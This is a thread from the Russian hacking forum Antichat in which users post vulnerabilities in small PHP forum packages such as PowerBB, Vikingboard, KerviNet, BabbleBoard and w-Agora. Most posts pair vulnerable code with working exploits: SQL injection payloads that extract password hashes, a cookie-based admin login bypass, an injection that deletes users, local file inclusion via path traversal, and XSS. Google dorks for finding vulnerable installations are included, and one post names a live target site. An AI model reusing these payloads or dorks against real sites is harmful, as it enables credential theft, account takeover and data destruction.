Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.12.2008, 18:26
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
vuBB 0.2.2 Beta
Vendor: vubb.net
Active XSS
Есть возможность указать URL удаленной аватарки.
Вставляем вместо адреса код:
Код:
javascript:eval(String.fromCharCode(97,108,101,114,116,40,120,115,115,41,59))
Dork: "Copyright 2005-2006 vuBB"
(с) iddqd
Последний раз редактировалось iddqd; 15.12.2008 в 18:29..
|
|
|

07.02.2009, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
DeluxeBB 1.3 Released (06-02-09)
пассивная xss
/misc.php?sub=register&redirect=xss
пассивная xss в админке
admincp.php?sub=editforum&fid=xss
x_x cedz
Последний раз редактировалось xcedz; 09.02.2009 в 20:13..
|
|
|

10.02.2009, 01:23
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
/***************************
* my little forum
* Version 2.1 beta 4
* http://mylittleforum.net
***************************/
passive xss
index.php?mode=posting&id=1&back=xss
|
|
|

26.04.2009, 19:16
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
PowerBB 2.2.1
PowerBB 2.2.1
Сайт: http://powerwd.com/
Cтарый проект (2006 год), который собрались реанимировать http://www.powerwd.com/forum/view_topic.php?id=868
SQL-injection
Уязвимый код:
register.php
PHP код:
. . .
else if (isset($_POST['form_sent']))
{
. . .
if(isset($_COOKIE["forumreferrer"]))
{
$referral_id = $_COOKIE["forumreferrer"];
$result = $db->query('SELECT referral_count FROM '.$db->prefix.'users WHERE id='.$referral_id) or error('Invalid Member ID', __FILE__, __LINE__, $db->error());
. . .
Переменная forumreferrer из куки не фильтруется. Инъекцию можно провести при регистрации нового пользователя
Эксплуатация:
Например отправляем пакет:
POST /register.php?action=register HTTP/1.1
Host: [host_name]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: uk,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: [host_name]/register.php
Cookie: PHPSESSID=[PHPSESSID_value]; forumreferrer=1+and+1=if(substring(version(),1,1)= 5,1,(select+1+union+select+2)); forum_cookie=[forum_cookie_value]
Content-Type: application/x-www-form-urlencoded
Content-Length: [num_Cont_Len]
code=&form_sent=1&req_username=[username]&req_password1=[password]
&req_password2=[password]&req_image=[captcha]&req_email1=[email]&timezone=0&email_setting=1&save_pass=1
Последний раз редактировалось ElteRUS; 05.06.2009 в 22:41..
|
|
|

29.05.2009, 23:10
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме: 6905523
Репутация:
1174
|
|
/////////////////////////
Vikingboard 0.1.2
_http://vikingboard.com
/////////////////////////
Файл с данными для подключения к бд:
/inc/drivers/sql/driver_MySQL.php
Структура базы:
PHP код:
`PREFIX|member`
`id` int(11) NOT NULL auto_increment,
`name` varchar(50) default NULL,
`password` varchar(50) default NULL,
`email` varchar(50) default NULL,
Директории доступные на запись:
/cache/
SQL - инъекция
/members.php
PHP код:
if (empty($_POST['order']))
{
$DESC = 'DESC';
}
else
{
$DESC = $_POST['order'];
}
/inc/drivers/sql/sql_MySQL.php
PHP код:
function get_member_list($order, $desc, $showfrom, $total)
{
$this->database->query("SELECT m.`id`, m.`name`, m.`posts`, m.`registred`, m.`homepage`, m.`title`, m.`group`, g.`g_name`
FROM {$this->prefix}member m, {$this->prefix}group g WHERE g.`id` = m.`group`
ORDER BY m.`{$order}` {$desc} LIMIT {$showfrom},{$total}");
$this->queries++;
return $this->database;
}
Пример эксплоита:
Код:
POST /vig/members.php HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Host: localhost
Accept: text/html
order=and if(ord(substring((select password from vboard_member where id=2),1,1))>5,1,(select id from vboard_pm))/*
Актив XSS
/post_parser.php
PHP код:
//BBCode for images
$post = preg_replace("#\[img\]([^\"']+?)\[/img\]#is", "<img src=\"$1\" alt=\"\" />", $post);
Код:
[#img=javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))]loleg![/img#]
склеил с предыдущим постом
Дорк: "Powered by Vikingboard"
|
|
|

29.06.2009, 23:35
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме: 5111568
Репутация:
2399
|
|
KerviNet forum v 1.1
KerviNet forum v 1.1
dork: "Copyright KerviNet"
Blind SQLinj & Auth Bypass
/index.php
PHP код:
if($_COOKIE['user_enter']=="auto") {
$enter_login=$_COOKIE['enter_login'];
$enter_parol=$_COOKIE['enter_parol'];
$mysql->query("SELECT name, pass, status FROM users WHERE name = '".$enter_login."' AND pass = '".$enter_parol."'");
exploit:
Код:
COOKIE: user_enter=auto
COOKIE: enter_login = abc
COOKIE: enter_parol = ' or name = (select name from users where id_user=1) and '1'='1';
sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' AND pass = '' or name = (select name from users where id_user<10 limit 1)
и вы автоматом зайдете под админом, даже не зная его имени (:
SQLinj
/message.php
PHP код:
9: $topic=$_GET['topic'];
18: if($topic) {
69: $mysql->query("SELECT name, viewing, voting, status, top_status, id_forum FROM topics WHERE id_topic = ".$topic);
exploit:
Код:
/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users
SiXSS
magic_quotes = Off
/message.php
exploit:
Код:
/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users
aXSS
/add_voting.php
PHP код:
22: $topic=$_GET['topic'];
61: if($topic) {
66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants);
74: }
function add_voting($time, $topic, $v_vopros, $variants) {
global $user;
global $user_ip;
if($user) {
global $mysql;
$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")");
$id_vname=mysql_insert_id();
for($i=0; $i<count($variants); $i+=1) {
$vr_nom=$i+1;
$mysql->query("INSERT INTO v_variants VALUES (".$vr_nom.", '".$variants[$i]."', ".$id_vname.")");
}
}
return $id_vname;
}
exploit:
Код:
/add_voting.php?topic=1
POST: add_voting = ok_add
POST: v_vopros = v
POST: v_variant1 = {XSS}
POST: v_variant2 = v2
удаление пользователей
/admin/edit_user.php
PHP код:
$del_user_id=$_POST['del_user_id'];
$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id);
exploit:
Код:
POST: del_user_id=(select user_id from users limit 1)
Full path disclosure
Код:
/include_files/voting_diagram.php
/include_files/voting.php
/include_files/topics_search.php
/include_files/topics_list.php
/include_files/top_part.php
/include_files/quick_search.php
/include_files/quick_reply.php
/include_files/moder_menu.php
/include_files/messages_list.php
/include_files/menu.php
/include_files/head.php
/include_files/forums_list.php
/include_files/forum_statistics.php
/include_files/forum_info.php
/include_files/birthday.php
/admin/head.php
|
|
|

05.09.2009, 09:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Pehota_Forum v2.0b
Активная XSS
Сообщения,Уязвимое поле Тема
посылаем сообщение любому пользователю, в поле Тема указываем <script>alert(/hiho/)</script>
и при получение сообщения высвечивается alert
ЗЫ еще есть активка при создание новой темы в самом форуме , но из за if (strlen($topic) > 25 and $topic != "") ограничения в 25 символов не возможно ее реализовать в целом,тока <script>alert()</script>
|
|
|

18.11.2009, 03:01
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
BabbleBoard 1.1.6
Сайт: http://www.babbleboard.co.uk/
Табличка с юзерами: members (name, password)
Дефолтовый префикс: babbleboard_
дорк: "Powered by BabbleBoard"
Гугл выдал пару xss и csrf. Если я набоянил тут – сори
Множественные LFI’и , вот некоторые
mycontrols.php ( нужно быть зарегенным )
PHP код:
include "includes/pages/mycontrols/" . $_GET['act'] . ".php";
index.php?page=mycontrols&act=../../../../robots.txt%00
admin.php ( нужно быть админом)
PHP код:
include "includes/pages/admin/" . $_GET['act'] . ".php";
index.php?page=admin&act= ../../../../robots.txt%00
header.php
PHP код:
if (isset($_COOKIE['bb_lang']) && (!isset($_COOKIE['bb_name']))) {
$board_lang = $_COOKIE['bb_lang'];
// Get language files...
include "lang/$board_lang/lang_forum.php";
Редактируем куки bb_lang=../../../../../robots.txt%00
structure.php
PHP код:
$page = $_GET['page'];
$page = escape_string($page);
elseif (@include ("includes/pages/$page.php"))
site.com/forum/index.php?page=../../../../robots.txt/././.[...]
Пример: http://else-design.info/forum/index.php?page=../../../../robots.txt/././././.[...]/./.
SQL-injection
При меджик_квотес офф
Уязвимый код:
register.php
PHP код:
} elseif ($_POST['form'] != '') {
$query_email = "select EMAIL from {$db_prefix}members WHERE EMAIL='".$_POST['email']."'";
$result_email = mysql_query($query_email) or die("register.php - Error in query: $query_email");
$email_clash = mysql_num_rows($result_email);
Эксплуатировать инъекцию можно при регистрации, вставляя свой скл-код в поле email. Правда там есть такой злобный жаваскриптовский фильтр, который не даст нам зарегится, пока мы не удовлетворим его условия. В частности он проверяет чтобы был символ @ и не было запятых =) Можно отправить пакет вручную или состряпать например такой няшный запрос, чтобы обойтись без запятых
filter@fuckoff'/**/or/**/(case/**/when/**/ascii(substring((select/**/name/**/from/**/babbleboard_members/**/limit/**/1/*
*/offset/**/0)/**/from/**/1/**/for/**/1))>97/**/then/**/'1'/**/else/**/(select/**/1/**/union/**/select/**/2)/**/end)='1
Последний раз редактировалось ElteRUS; 18.11.2009 в 15:07..
|
|
|

28.12.2009, 20:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
w-Agora forum
Web site : http://www.w-agora.com
Version : 4.2.1
Local File Inclusion
Vuln file: globals.inc [str:169]
PHP код:
/*...*/
if (isset($_GET['lang']) ) {
$lang = strtolower($_GET['lang']);
} elseif (isset($_POST['lang'])) {
$lang = $_POST['lang'];
} elseif (isset($_COOKIE['wa_lang'])) {
$lang = $_COOKIE['wa_lang'];
} elseif (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ) {
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
} elseif (isset($_COOKIE['lang'])) {
$lang = strtolower($_COOKIE['lang']);
}
/*...*/
require ("$lang_dir/lang_$lang.inc");
/*...*/
Exploit:
if magic_quotes = OFF
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Cookie: lang=/../../../../../../[local_file]%00
-------------------------------------------
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
Последний раз редактировалось RulleR; 28.12.2009 в 20:06..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|